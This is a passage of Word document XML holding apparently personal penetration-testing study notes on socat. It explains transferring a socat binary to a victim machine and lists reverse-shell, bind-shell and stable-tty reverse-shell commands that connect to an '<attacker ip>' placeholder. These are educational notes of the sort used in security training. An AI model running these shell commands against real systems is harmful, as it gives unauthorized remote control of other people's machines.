      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -0 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – on victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47DFCD" w14:textId="46AA8530" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>in a windows CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C45443" w14:textId="74F4C784" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">done with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> using Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D651C69" w14:textId="59F0CF86" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;/socat.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> C:\\Windows\temp\socat.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06562605" w14:textId="5EEDEFCF" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Changing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> size must be done manually in reverse or bind shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6915C7EA" w14:textId="3B7582E4" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>open another terminal and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B3B39" w14:textId="454F4E3B" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -a – note down values for “rows” and “columns”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E79033B" w14:textId="6998BC30" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>in reverse/bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2378709B" w14:textId="69FB73DD" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> rows &lt;number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98CF9B" w14:textId="51AF87BE" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> cols &lt;number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F76A13" w14:textId="205E2ADD" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allows programs such as text editors to correctly open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F1C9A" w14:textId="3AD6CC4C" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D684EBB" w14:textId="377E5E48" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>a connector between two points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F3D10B" w14:textId="4FEB2E8C" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>listening port and file, listening port and keyboard, two listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C659F4F" w14:textId="78E915E4" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F9C9A3" w14:textId="481AA886" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP-L:&lt;port&gt; -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFF864" w14:textId="726EE8C0" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP:&lt;local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt;:&lt;local port&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXEC:powershell.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>;pipes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23E3FDD8" w14:textId="0325A434" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">pipes forces </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">/cmd.exe to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> style standard input and output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619204D" w14:textId="7479CA53" w:rsidR="00435DC0" w:rsidRPr="0084205E" w:rsidRDefault="00435DC0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Linux equivalent – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP</w:t>
      </w:r>
      <w:r w:rsidR="00280F52" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">:&lt;LOCAL IP&gt;:&lt;LOCAL PORT&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00280F52" w:rsidRPr="0084205E">
        <w:t>EXEC:”bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00280F52" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> =li”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53C3F7" w14:textId="1C01A25B" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bind Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE3376" w14:textId="21F728E1" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP-L:&lt;PORT&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXEC:”bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -li” – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914640B" w14:textId="1834DE5D" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP-L:&lt;PORT&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXEC:powershell.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>,pipes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F434178" w14:textId="669013F8" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP:&lt;TARGET IP&gt;:&lt;TARGET PORT&gt; - </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> on target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B0B01" w14:textId="2FD3B12E" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Fully Stable Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740FA64" w14:textId="7C032A59" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>only works with Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C94A4" w14:textId="14A1D8B5" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP-L:&lt;PORT&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>FILE:`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>`,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>raw,echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20035319" w14:textId="03950F55" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>connecting a listening port to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879DFB0" w14:textId="04580F4A" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">immediately stable and allocates a full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="414F38CA" w14:textId="63BDE02C" w:rsidR="00280F52" w:rsidRPr="0084205E" w:rsidRDefault="00280F52" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">target must have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DEDB3" w14:textId="34A7CCC9" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">possible to upload a precompiled </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> binary to be executed as normal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24680161" w14:textId="25C4934E" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> TCP:&lt;attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:&lt;attacker port&gt; EXEC: “bash -li</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>,stderr,sigint,setsid,sane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0153CFD6" w14:textId="7D774749" w:rsidR="0056723A" w:rsidRPr="0084205E" w:rsidRDefault="0056723A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
